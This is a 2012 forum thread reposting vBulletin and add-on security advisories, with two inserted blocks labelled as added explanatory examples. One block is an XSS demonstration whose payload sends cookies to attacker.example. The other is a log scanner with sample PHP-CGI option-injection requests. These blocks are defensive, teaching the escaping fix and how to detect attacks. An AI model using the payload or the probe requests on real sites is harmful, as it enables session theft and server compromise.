
vBulletin Security News

Discussion in 'Forum Management' started by CinVin, Mar 25, 2012.

  1. CinVin Active Member

    Security Vulnerabilities Found in Popular vBulletin Addons.
    Source: vBulletin.com

    We have recently been made aware of an XSS vulnerability affecting Lite and Pro versions of vBShout v6.0.3 and lower. Dragonbyte Tech has released vBShout v6.0.4 to address this issue.

    You can read more about the issue here: http://www.dragonbyte-tech.com/f77/v...ease-6831-new/
  2. gemma Moderator

    They've now released version 6.0.7 of the shoutbox, three versions in the space of a few days to patch security vulnerabilities. And 5 of their other modifications have all required security updates in the past day. :eek:
  3. CinVin Active Member

    vBulletin Security Patch for vBulletin 4.1.4 - 4.1.11 for Suite & Forum - 03/23/2012
    Source: vBulletin.com

    A recent vBulletin 4 (4.1.4 - 4.1.11 Suite & Forum) report indicated that there was a potential XSS exploit vector in the editor. Once the cause of the issue was isolated, code changes were made to eliminate the reported threat.

    The issue does not affect vBulletin 3.x and vBulletin 4.0 - 4.1.3.

    This patch has been issued for vBulletin 4.1.4 through 4.1.11.

    To improve the security of your vBulletin 4 Suite installation please download the patch from the members area of vBulletin: http://members.vbulletin.com/
    We recommend you install this security patch as soon as possible.

    The upgrade process is the same as previous patch level releases - simply download the patch from the Members Area, extract the files and upload to your web server, overwriting the existing files. There is no upgrade script required.

    Advanced Users - Files updated in the patch are:
    • includes/version_vbulletin.php
    • clientscript/ckeplugins/bbcode/plugin.js (if js uncompressed)
    • clientscript/ckeditor/ckeditor.js (if js compressed)

    Please note that this issue and fix affects BOTH vBulletin SUITE and FORUM.
  4. Kevin Code Monkey

    Were they using some common code in all of them or just the same mistake several times?
  5. Kevin Code Monkey

    Surprised? Anybody? :coffee:
  6. gemma Moderator

    I can't vouch for all the vulnerabilities but it looks like similar errors in some of their mods, using TYPE_STR instead of TYPE_NOHTML - I don't know if all the mods are by the same author or not, hard to tell when everything is released as DragonByte Technologies. In fact the vB4 release forum is beginning to look like a DBT dumping ground!
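The TYPE_STR versus TYPE_NOHTML mistake gemma describes, shown as an added example (not code from vBulletin, DragonByte Technologies, or any poster in this thread). The `clean()` function is a deliberately simplified stand-in for vBulletin's input cleaner that keeps only the property at issue here, that TYPE_NOHTML entity-encodes markup and TYPE_STR does not; `render_shout()`, `contains_live_script()` and the payload are assumptions constructed for the example.

```php
<?php
// Added example, not vBulletin's, DragonByte's, or any poster's code.
// clean() is a simplified stand-in for vBulletin's input cleaner, keeping only
// the property at issue: TYPE_NOHTML entity-encodes markup, TYPE_STR does not.
const TYPE_STR    = 1;   // trimmed string, HTML left intact
const TYPE_NOHTML = 2;   // trimmed string with <, >, &, " and ' entity-encoded

function clean($raw, $type)
{
    $value = trim((string) $raw);
    if ($type === TYPE_NOHTML) {
        return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
    }
    return $value;   // TYPE_STR: whatever the user sent, markup included
}

// A shoutbox-style template (assumed for the example) that drops the cleaned
// value straight into HTML; safe only if cleaning already made the value inert.
function render_shout($username, $message)
{
    return '<div class="shout"><b>' . $username . '</b>: ' . $message . '</div>';
}

// Reviewer's check over a mod's rendered output: does a live <script> tag survive?
function contains_live_script($html)
{
    return preg_match('/<script\b/i', $html) === 1;
}

// Constructed malicious shout: a cookie-stealing script tag.
$payload = '<script>document.location="http://attacker.example/?c="+document.cookie</script>';

// Vulnerable pattern (the one gemma points at): TYPE_STR leaves the tag live.
$vulnerable = render_shout('alice', clean($payload, TYPE_STR));
// Hardened pattern: TYPE_NOHTML turns the same input into harmless text.
$hardened   = render_shout('alice', clean($payload, TYPE_NOHTML));

printf("TYPE_STR    -> %s\n", $vulnerable);
printf("TYPE_NOHTML -> %s\n", $hardened);
printf("live script with TYPE_STR: %s, with TYPE_NOHTML: %s\n",
    contains_live_script($vulnerable) ? 'yes' : 'no',
    contains_live_script($hardened)   ? 'yes' : 'no');
```

In a vBulletin mod the type constant is the third argument to `$vbulletin->input->clean_gpc()` (and the per-field type in `clean_array_gpc()`), so the audit gemma is describing amounts to finding every TYPE_STR whose value reaches a template or echoed HTML. Note the limit of the fix: TYPE_NOHTML makes a value safe for HTML body text only; a value placed inside a JavaScript string, an attribute, or a URL needs encoding for that context instead.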
  7. CinVin Active Member

    vBulletin 3.x MAPI Plugin 1.4.3 released with security patch - 04/23/2012
    Source: vBulletin.com

    To support the upcoming release of vBulletin Mobile Suite 1.3, which contains vBulletin's iOS Mobile App 1.3 and Android Mobile App 1.3, we have released vBulletin 3.x MAPI Plugin 1.4.3. This release contains nine changes required to fix existing mobile app issues on forums running vBulletin 3. A security patch has been included to improve the security of the vBulletin 3.x MAPI plugin as the result of a recent internal security review. Although no exploits have been reported, we urge our customers to upgrade as soon as possible.

    vBulletin 3 customers should not upgrade unless they have the vBulletin Mobile Suite.

    vBulletin 3.x MAPI Plugin 1.4.3 is compatible with vBulletin 3.7.5+. vBulletin Blogs customers must have Blogs 2.0.4 installed before upgrading to 3.x MAPI Plugin 1.4.3. Please visit your vBulletin Members Area to download it.

    The following additional steps need to be taken after upgrade to vBulletin 3.x MAPI Plugin 1.4.3.

    1. Download the "API-Log-Clean.xml" attached to this thread. (Included in the do_not_upload folder for full installs.)
    2. Import "API-Log-Clean.xml" using the "Manage Products" interface in the "Plugins & Products" section of your Admin CP. The cleanup script will run on install. AdminCP -> Plugins & Products -> Manage Products -> Add/Import Product
    3. Delete "API-Log-Clean" using the "Product Manager" option in the "Plugins & Products" section of your Admin CP. (Optional. The product is automatically disabled after the script runs.)


    Discuss the vBulletin 3.x MAPI Plugin 1.4.3 release - HERE
  8. CinVin Active Member

    vBulletin Security Patch for vBulletin 4.1.2 - 4.1.11 for Suite & Forum - 04/23/2012
    Source: vBulletin.com

    vBulletin has released a security patch to improve the security of the vBulletin 4 MAPI (4.1.2 - 4.1.11 Suite & Forum) as the result of a recent internal security review. Although no exploits have been reported, we urge our customers to upgrade as soon as possible.

    The changes do not affect vBulletin 4.0.0 - 4.1.1.

    This patch has been issued for vBulletin 4.1.2 through 4.1.11. A separate PL1 has been issued for vBulletin 4.1.12.

    These MAPI security improvements have been added for vBulletin 3.x with the release of 3.x MAPI 1.4.3.

    To improve the security of your vBulletin 4 installation, please download the patch from the members area of vBulletin: http://members.vbulletin.com/

    The upgrade process is slightly more complicated for this patch level release.

    1. Download the latest PL for your vBulletin 4.1.2 - 4.1.11 install from https://members.vbulletin.com.
    2. Upload the patch to your server.
    3. Unzip the patch to your vBulletin 4 install directory. (Ex. /var/www/html/myforum)
    4. Download the "API-Log-Clean.xml" attached to this thread. (Included in the do_not_upload folder for full installs.)
    5. Import "API-Log-Clean.xml" using the "Manage Products" interface in the "Plugins & Products" section of your Admin CP. The cleanup script will run on install. AdminCP -> Plugins & Products -> Manage Products -> Add/Import Product
    6. Delete "API-Log-Clean" using the "Product Manager" option in the "Plugins & Products" section of your Admin CP. (Optional. The product is automatically disabled after the script runs.)

    Advanced Users - Files updated in the patch are:

    • includes/init.php


    Please note that this issue and fix affects BOTH vBulletin 4 SUITE and FORUM.

    Discuss the security patch - HERE
  9. CinVin Active Member

    vBulletin Security Patch for vBulletin 4.1.12 for Suite & Forum - 04/23/2012
    Source: vBulletin.com

    vBulletin has released a security patch to improve the security of the vBulletin 4 MAPI for 4.1.12 Suite & Forum as the result of a recent internal security review. Although no exploits have been reported, we urge our customers to upgrade as soon as possible.

    The changes do not affect vBulletin 4.0.0 - 4.1.1.

    This patch has been issued for vBulletin 4.1.12. A separate set of patches have been issued for vBulletin 4.1.2 - 4.1.11.

    The MAPI security improvements have been added for vBulletin 3.x with the release of 3.x MAPI 1.4.3.

    To improve the security of your vBulletin 4 installation, please download the patch from the members area of vBulletin: http://members.vbulletin.com/

    In addition to the security improvements, we've resolved the following 4.1.12 issues.

    • VBIV-14742 - Push notifications broken in FR 4.1.12 add-on.
    • VBIV-14685 - Tag in static page cause Fatal error on page with General Search widget set to return Static Pages
    • VBIV-14663 - Quoting doesn't work in the mobile style
    • VBIV-14660 - Static HTML in CMS always displays all content
    • VBIV-14754 - unset($VB_API_PARAMS_TO_VERIFY['vbseourl']) to match vB3 MAPI change.
    • VBIV-14681 - HTML is stripped from article previews
    • VBIV-14667 - Category pages do not load if using basic/advanced friendly URLs


    The upgrade process is slightly more complicated for this patch level release.


    1. Download PL1 for vBulletin 4.1.12 from https://members.vbulletin.com.
    2. Upload the patch to your server.
    3. Unzip the patch to your vBulletin 4 install directory. (Ex. /var/www/html/myforum)
    4. Run ./install/upgrade.php. (Required for 4.1.12.)
    5. Download the "API-Log-Clean.xml" attached to this thread. (Included in the do_not_upload folder for full installs.)
    6. Import "API-Log-Clean.xml" using the "Manage Products" interface in the "Plugins & Products" section of your Admin CP. The cleanup script will run on install. AdminCP -> Plugins & Products -> Manage Products -> Add/Import Product
    7. Delete "API-Log-Clean" using the "Product Manager" option in the "Plugins & Products" section of your Admin CP. (Optional. The product is automatically disabled after the script runs.)


    Advanced Users - Files updated in the patch are:

    • /api.php
    • /forumrunner/push.php
    • /includes/class_friendly_url.php
    • /includes/init.php
    • /install/vbulletin-mobile-style-blog.xml
    • /install/vbulletin-mobile-style.xml
    • /packages/vbcms/content/phpeval.php
    • /packages/vbcms/content/staticpage.php
    • /packages/vbcms/item/content/article.php
    • /packages/vbcms/item/content/phpeval.php
    • /packages/vbcms/search/result/staticpage.php

    Please note that this issue and fix affects BOTH vBulletin 4 SUITE and FORUM.

    Discuss the security patch - HERE
    Discuss vBulletin 4.1.12 - HERE
  10. CinVin Active Member

    PHP-CGI query string parameter vulnerability
    Source: vBulletin.com

    A vulnerability has been found in PHP installations accessed via CGI where an attacker can gain access to command line parameters of PHP and access the server through this vulnerability. This can allow them to manipulate websites outside the standard operating procedure. According to the report, servers set up to use FastCGI are not vulnerable. FastCGI is the recommended method of installing PHP today. However a lot of servers continue to use the CGI method of calling PHP.

    To see if your server uses CGI or FastCGI, look at your PHP Info (Maintenance -> View PHP Info) in your Admin Control Panel. The first table should have an entry for Server API. This should say "CGI/FASTCGI". If it only says "CGI" then you should contact your host so they can update the server to use FastCGI.

    PHP has released PHP 5.3.12 and 5.4.2 to try and counteract this issue but experts say it isn't adequate.

    For more information please see:
    http://www.kb.cert.org/vuls/id/520827
    http://www.h-online.com/open/news/it...2-1567532.html
    http://www.h-online.com/security/new...e-1568454.html
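The mechanism the post above describes, a query string that reaches php-cgi as its own command-line options, leaves a recognisable trace in web server access logs. The scanner below is an added example, not from vBulletin.com or the referenced CERT note; the log lines are constructed, and the two option-style query strings in them are assumed illustrations of the pattern, not vectors taken from the page. One detail it relies on that the post does not spell out: a CGI web server hands the query string to the script as command-line arguments only when the query string contains no unencoded `=`, so the check looks at that first.

```php
<?php
// Added example, not from vBulletin.com or the CERT note: flag access-log
// requests whose query string php-cgi (plain CGI, not FastCGI) would parse as
// command-line options. Sample lines below are constructed for the example.

// Apache/nginx "combined" format: client, request line, status, then the rest.
const LOG_LINE = '/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) /';

function is_cgi_option_query($target)
{
    $query = parse_url($target, PHP_URL_QUERY);
    if (!is_string($query) || $query === '') {
        return false;
    }
    // Per the CGI spec the server passes the query string as argv only when it
    // holds no unencoded '='; an encoded %3d still gets through to php-cgi.
    if (strpos($query, '=') !== false) {
        return false;
    }
    // Arguments are '+'-separated; php-cgi treats a leading '-' as an option.
    $first = rawurldecode(strtok($query, '+'));
    return substr($first, 0, 1) === '-';
}

function scan_log(array $lines)
{
    $hits = array();
    foreach ($lines as $n => $line) {
        if (!preg_match(LOG_LINE, $line, $m)) {
            continue;   // not a combined-format line; skip rather than guess
        }
        list(, $client, $method, $target, $status) = $m;
        if (is_cgi_option_query($target)) {
            $hits[] = array(
                'line'   => $n + 1,
                'client' => $client,
                'method' => $method,
                'target' => $target,
                'status' => (int) $status,
            );
        }
    }
    return $hits;
}

// Constructed sample: two ordinary forum requests, then two option-style ones
// (assumed illustrations; see the CERT note for the vectors actually reported).
$sample = array(
    '203.0.113.5 - - [10/May/2012:10:01:02 +0000] "GET /forum/showthread.php?t=1234 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/May/2012:10:01:09 +0000] "POST /forum/login.php?do=login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/May/2012:10:02:41 +0000] "GET /forum/index.php?-s HTTP/1.1" 200 9822 "-" "curl/7.21"',
    '198.51.100.7 - - [10/May/2012:10:02:45 +0000] "GET /forum/index.php?-d+display_errors%3d1 HTTP/1.1" 200 301 "-" "curl/7.21"',
);

foreach (scan_log($sample) as $h) {
    printf("line %d: %s %s %s (HTTP %d)\n",
        $h['line'], $h['client'], $h['method'], $h['target'], $h['status']);
}
```

Only the two `index.php?-...` lines are reported; `?t=1234` and `?do=login` carry a literal `=` and never reach php-cgi as options. A hit shows an attempt, not a success, so read it alongside the HTTP status and response size. The remedy in the post stands: have the host switch PHP to FastCGI (or a fixed PHP release) rather than trying to filter these requests at the forum.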
  11. CinVin Active Member

    vBulletin Security Patch for vBulletin 3.8.7 & 4.0 - 4.2 (Suite & Forum) - 06/07/2012
    Source: vBulletin.com

    A recent vBulletin report indicated that there was a potential exploit vector in flood protection. Once the cause of the issue was isolated, code changes were made to eliminate the reported threat.

    This issue affects BOTH vBulletin 3 and vBulletin 4 (Suite & Forum).

    A patch has been issued for vBulletin 3.8.7 through 4.2.

    To improve the security of your vBulletin 4 installation, please download the patch from the members area of vBulletin: http://members.vbulletin.com/

    The standard upgrade process for a patch level release is:

    1. Download the patch for the version of vBulletin you're currently running from https://members.vbulletin.com/patches.php.
    2. Extract the vBulletin patch files from the zip file.
    3. Upload the patch files to your server, overwriting the old files.


    Advanced Users:

    Files updated in the patch for vBulletin 3.8.7 & 4.0 - 4.1.12 (Suite & Forum).

    • includes/class_dm_threadpost.php
    • includes/class_floodcheck.php
    • includes/version_vbulletin.php


    Files updated in the patch for vBulletin 4.2 (Suite & Forum).

    • includes/adminfunctions.php
    • includes/class_dm_threadpost.php
    • includes/class_floodcheck.php
    • includes/class_upgrade_420a1.php
    • install/init.php
    • install/mysql-schema.php
    • vb/activitystream/populate/forum/thread.php
    • includes/version_vbulletin.php


    Licensed customers can discuss the security patch - HERE

    Special thanks to cellarius, Andreas, s.molinari, and the vBulletin Germany team.
  12. CinVin Active Member

    vBulletin Security Patch for vBulletin 4.2 (Suite & Forum) Only - 06/18/2012
    Source: vBulletin.com

    A recent vBulletin report indicated that there was a potential XSS exploit vector involving the new Activity Stream. Once the cause of the issue was isolated, code changes were made to eliminate the reported threat.

    This issue affects ONLY vBulletin 4.2 (Suite & Forum).

    A patch has been issued for vBulletin 4.2.

    To improve the security of your vBulletin 4 installation, please download the patch from the members area of vBulletin: http://members.vbulletin.com/

    The standard upgrade process for a patch level release is:

    1. Download the patch for the version of vBulletin you're currently running from https://members.vbulletin.com/patches.php.
    2. Extract the vBulletin patch files from the zip file.
    3. Upload the patch files to your server, overwriting the old files.


    The upgrade.php script does not need to be run.

    Advanced Users:
    Files updated in this patch for vBulletin 4.2 (Suite & Forum).

    • /vb/activitystream/view/perm/calendar/event.php
    • /includes/vbulletin_version.php

    Please note this list does not contain the files changed in vBulletin 4.2 PL1. Only the files changed in vBulletin 4.2 PL2 are listed. However, PL2 also contains all of the changes from PL1.

    Licensed customers can discuss the security patch - HERE
